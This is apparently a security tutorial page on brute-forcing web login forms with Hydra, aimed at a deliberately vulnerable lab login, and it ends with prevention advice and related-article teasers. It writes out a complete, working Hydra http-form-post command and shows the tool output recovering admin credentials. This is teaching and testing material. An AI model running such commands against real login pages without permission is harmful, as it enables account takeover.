Automated Brute Forcing on web-based login
Last Updated :
29 Sep, 2022
Brute force attacks work by calculating every possible combination that could make up a password and testing it to see if it is the correct password. As the password’s length increases, the amount of time, on average, to find the correct password increases exponentially. This means short passwords can usually be discovered quite quickly, but longer passwords may take decades [Source :
Wiki]
It may be feasible in some situations as computer hardwares are getting faster and faster. A simple brute-force attack would start with one-digit passwords, then two-digit passwords and so on, trying all possible combinations until one works.
A better idea is "dictionary attack" that tries words in a dictionary — or a list of common passwords — instead of all possible passwords. This can be very effective, as many people use such weak and common passwords.
We can use automated tool for Brute forcing web-based login form
Using Hydra to dictionary-attack web-based login forms
Hydra is an online password cracking for dictionary-attacks. It tries lists of user-names and passwords until a successful login is found. It is multi-threaded and can try username/password combinations at a rate of thousands per minute [Source
Hydra can be used to attack many different services including IMAP, SMB, HTTP, VNC, MS-SQL MySQL, SMTP, SSH, and many more
This tool should not be used to attack websites or services where you do not have permission to do so. Use this for legitimate testing purposes only.
An example attack
The
Web Security Dojo has various vulnerable applications that you can use to test these techniques. So looking at an example the w3af testing framework has a test login at the following location
http://192.168.1.69/w3af/bruteforce/form_login/
The important parts of the HTML form are:
HTML
<form name="input" action="dataReceptor.php" method="post">
Username:
<input type="text" name="user">
Password:
<input type="password" name="pass">
If we put in one wrong username and password combination we get:
Bad login, stop bruteforcing me!Bad u/p combination for user: a
So, now we have the information we need to attack this login form, we can use this info to construct a Hydra brute-force attack as follows:
hydra 192.168.1.69 http-form-post "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
If we break this up
Host = 192.168.1.69
Method = http-form-post
URL = /w3af/bruteforce/form_login/dataReceptor.php
Form parameters = user=^USER^&pass=^PASS^
Failure response = Bad login
Users file = users.txt
Password file = pass.txt
Threads = -t 10
Wait for timeout = -w 30
Output file = -o hydra-http-post-attack.txt
Hydra basically iterates through all the username/password combinations, until it gets a response that does not contain the text "Bad login". When we run this attack we get:
Hydra basically iterates through all the username/password combinations, until it gets a response that does not contain the text "Bad login". When we run this attack we get:
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.Hydra (http://www.thc.org/thc-hydra) starting at 2011-08-22 13:11:03
[DATA] 5 tasks, 1 servers, 5 login tries (l:5/p:1), ~1 tries per task
[DATA] attacking service http-post-form on port 80
[STATUS] attack finished for 192.168.1.69 (waiting for children to finish)
[80][www-form] host: 192.168.1.69 login: admin password: 1234
Hydra (http://www.thc.org/thc-hydra) finished at 2011-08-22 13:11:07
As you can see, this was successful and found the user "admin" with password "1234".
Prevention
- The first is to implement an account lockout policy. For example, after three failed login attempts, the account is locked out until an administrator unlocks it.
- We should use a challenge-response test to prevent automated submissions of the login page. Tools such as the free reCAPTCHA can be used to require the user to enter a word or solve a simple math problem to ensure the user is, in fact, a person.
- Any Web application should enforce the use of strong passwords. At a minimum, requiring users to choose passwords of eight letters or more with some complexity (letters and numbers, or requiring one special character) is an excellent defense against brute force attacks.
Sources
http://searchsecurity.techtarget.com/definition/brute-force-cracking
https://en.wikipedia.org/wiki/Brute-force_attack
https://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/
https://sourceforge.net/projects/websecuritydojo/
Similar Reads
How does the Token-Based Authentication work ?
Digital transformation brings security concerns for users to protect their identity from bogus eyes. According to US Norton, on average 8 lakh accounts are being hacked every year. There is a demand for high-security systems and cybersecurity regulations for authentication. Traditional methods rely
6 min read
Web Parameter Tampering Attack on Web Servers
Parameter tampering is a form of web-based cyber attack where specific URL parameters are changed without the user's knowledge. In some cases, data entered by a user into a form field on a webpage may be modified without the user's permission. The browser may be directed to a link, page, or site tha
6 min read
Core Defences Mechanism in Web Applications
We divide core defences in web applications into three areas: Handling User Access, Handling User Input, and Handling Attackers. These are explained as following below. 1. Handling User Access: First task is to handle access according to user (admin user, anonymous user, normal user). Most web appli
6 min read
Best Practices for Secure Coding in Web Applications
Web applications are essential for corporations to deliver digital offerings, and they have got grow to be increasingly important in recent years as increasingly human beings get proper access to offerings online. However, with the upward push of cyber-assaults and data breaches, it’s vital to put i
6 min read
Active Social Engineering Defense (ASED)
A proactive tactic called Active Social Engineering Defense (ASED) is used to lessen the risk of being the target of social engineers. We must first comprehend social engineering in order better to comprehend active social engineering defense (ASED). Social Engineering Attack:Without the use of malw
6 min read
What is Input Validation Attack?
Cyberattacks are dangerous attacks that take place on the computer systems of individuals/ organizations by unauthorized individuals known as cyber attackers or hackers. Cyberattackers aim to take advantage of computer system vulnerabilities to get into the computer network and access the secured us
3 min read
User Enumeration in Ethical Hacking
User enumeration is an important stage in penetration testing where the hacker will use a set of methods to find out valid user names on a company’s network. They will then attempt to use each of these usernames and passwords until they are able to gain unauthorized access to the system. User Enumer
3 min read
Two Factor Authentication Implementation Methods and Bypasses
Two Factor Authentication or 2FA is an advanced method of user authentication and a subset of multi-factor authentication mechanisms. 2FA enhances the security of its user accounts by adding another layer of authenticity challenge after traditional passwords used in single-factor authentication. The
4 min read
Sniffing of Login Credential or Password Capturing in Wireshark
Wireshark is a free and open-source packet analysis tool that lets you capture and analyze network traffic in real-time. It is available for Windows, macOS, and Linux operating systems. Wireshark captures network packets and displays the captured data in a human-readable format for easy analysis and
3 min read
User Directed Spidering with Burp
User Directed Spidering with Burp is a great way to catch security vulnerabilities in a web application. A spider is a software that goes through your website, following every link and looking for the next page it needs to visit. This means it can't get stuck when there are loops or missing links -
3 min read